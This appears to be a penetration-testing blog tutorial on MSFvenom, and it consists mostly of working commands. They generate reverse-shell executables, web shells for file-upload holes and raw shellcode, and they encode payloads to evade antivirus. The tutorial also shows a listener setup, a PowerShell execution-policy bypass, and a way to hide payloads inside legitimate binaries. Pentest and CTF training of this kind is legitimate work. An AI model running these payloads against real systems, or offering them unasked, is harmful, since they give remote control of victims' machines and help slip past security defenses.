Ethical Hacking #msfvenom#metasploit#payloads

MSFvenom Payload Generation: Complete Guide

Learn how to use MSFvenom to generate reverse shells, encode payloads, and choose output formats like exe, elf, and raw for penetration testing.

May 10, 2026 7 min read

MSFvenom Payload Generation: A Complete Practical Guide

MSFvenom is the go-to payload generation tool in the Metasploit Framework. It merges two older tools — msfpayload and msfencode — into a single, powerful utility that lets you craft shellcode, executables, and scripts for virtually any target platform. Whether you are preparing for a CTF, running an authorized red-team engagement, or studying for your OSCP, understanding MSFvenom is essential.

Legal notice: Only use MSFvenom against systems you own or have explicit written permission to test. Unauthorized use is illegal.

Understanding the MSFvenom Workflow

MSFvenom works in three conceptual steps:

Select a payload — what happens on the target after execution (e.g., open a shell)
Choose a format — how the payload is packaged (exe, elf, python, raw, etc.)
Optionally encode — obfuscate the payload to bypass signature-based detection

The basic syntax is:

msfvenom -p <payload> [options] -f <format> -o <output_file>

Listing Available Payloads

Before generating anything, explore what is available:

# List all payloads
msfvenom --list payloads

# Filter by platform
msfvenom --list payloads | grep windows/x64

# List encoders
msfvenom --list encoders

# List output formats
msfvenom --list formats

Key payload naming conventions:

Pattern	Meaning
`windows/meterpreter/reverse_tcp`	Staged, Windows, Meterpreter shell
`windows/meterpreter_reverse_tcp`	Stageless, Windows, Meterpreter shell
`linux/x86/shell_reverse_tcp`	Stageless, Linux 32-bit, plain shell
`php/meterpreter_reverse_tcp`	PHP Meterpreter (stageless)

Staged vs. Stageless: Staged payloads (forward slash between shell type and transport) are smaller — they download the main payload from your listener at runtime. Stageless payloads embed everything upfront. Use stageless when you cannot guarantee a stable connection back to your listener during staging.

Generating a Windows Reverse Shell (EXE)

The most common use case: a Windows executable that calls back to your machine.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 \
  LPORT=4444 \
  -f exe \
  -o shell.exe

Key flags:

-p — payload module path
LHOST — your listener IP (use tun0 interface IP on VPN-based labs)
LPORT — listener port
-f exe — output format
-o — output filename

Generating a Linux ELF Payload

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=10.10.14.5 \
  LPORT=9001 \
  -f elf \
  -o shell.elf

chmod +x shell.elf

ELF binaries work on Linux and most Unix-like systems. After transferring to the target, mark as executable before running.

Web Payloads: PHP, ASP, JSP

When you have a file upload vulnerability, web shell payloads are invaluable:

# PHP — works on most Linux web servers
msfvenom -p php/meterpreter_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw \
  -o shell.php

# ASP — Windows/IIS targets
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f asp \
  -o shell.asp

# JSP — Java application servers (Tomcat, JBoss)
msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw \
  -o shell.jsp

Generating Raw Shellcode

Raw shellcode is useful when injecting into another program or embedding in a custom dropper:

# C-style shellcode array
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=443 \
  -f c

# Python bytes object
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=443 \
  -f python

The -f c output can be pasted directly into a C shellcode runner for process injection exercises.

Encoding Payloads

Encoders transform shellcode to help evade simple signature detection. Note that modern EDR solutions use behavioral analysis, so encoding alone is rarely sufficient against enterprise defenses — but it still matters for older AV and CTF scenarios.

# Single encoding pass with shikata_ga_nai (x86 only)
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 5 \
  -f exe \
  -o encoded_shell.exe

-e x86/shikata_ga_nai — the encoder (polymorphic XOR additive feedback)
-i 5 — five encoding iterations

For x64 payloads, use x64/xor_dynamic or x64/zutto_dekiru instead.

Checking Bad Characters

When exploiting buffer overflows, certain bytes break the shellcode (e.g., \x00 null bytes). Generate a payload while excluding them:

msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -b "\x00\x0a\x0d" \
  -f c

The -b flag lists bad characters to avoid. MSFvenom automatically selects an appropriate encoder.

Setting Up the multi/handler Listener

A payload is useless without a listener. In msfconsole:

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j

ExitOnSession false keeps the handler alive to catch multiple connections. -j runs it as a background job so you can continue using the console.

Catching Multiple Session Types

The multi/handler works with almost any payload — just match the payload setting to what you generated with MSFvenom. For a plain netcat-style shell:

set payload generic/shell_reverse_tcp

PowerShell Payloads for Windows

When you need to execute in-memory on Windows without dropping an exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=443 \
  -f psh-reflection \
  -o shell.ps1

Deliver via: powershell -ep bypass -f shell.ps1

Quick Reference Table

Target OS	Format	Payload Example
Windows 64-bit	exe	`windows/x64/meterpreter/reverse_tcp`
Linux 64-bit	elf	`linux/x64/shell_reverse_tcp`
PHP web app	raw	`php/meterpreter_reverse_tcp`
ASP.NET / IIS	aspx	`windows/meterpreter/reverse_tcp`
Java app server	raw	`java/jsp_shell_reverse_tcp`
Android	apk	`android/meterpreter/reverse_tcp`
macOS	macho	`osx/x64/shell_reverse_tcp`

Troubleshooting Common Issues

“No platform was selected” warning — add -p with a fully qualified payload path including the OS prefix.

Handler catches connection then immediately dies — payload architecture mismatch. Verify whether the target is 32-bit or 64-bit and use the matching payload.

AV deletes the file immediately — try encoding, change the output format, or embed in a legitimate binary template with -x <template.exe> and -k to keep the template functionality.

Payload too large — switch to a staged payload (the / variant) which only sends a small stub initially.

Summary

MSFvenom is a flexible, platform-agnostic payload factory. The key workflow is: pick a payload matching your target OS and architecture, set LHOST/LPORT to your listener, choose a delivery format, optionally encode to reduce detection, and catch the callback with multi/handler. Mastering these fundamentals opens the door to more advanced post-exploitation work with Meterpreter modules, pivoting, and lateral movement.

#penetration-testing #reverse-shell #payloads #metasploit #msfvenom

// related articles

ethical-hacking BeEF Browser Exploitation Framework: Lab Guide 7 min read ethical-hacking Chisel and Ligolo-ng: Tunneling Guide for Pentests 7 min read ethical-hacking OWASP Top 10 2021: Complete Security Guide 7 min read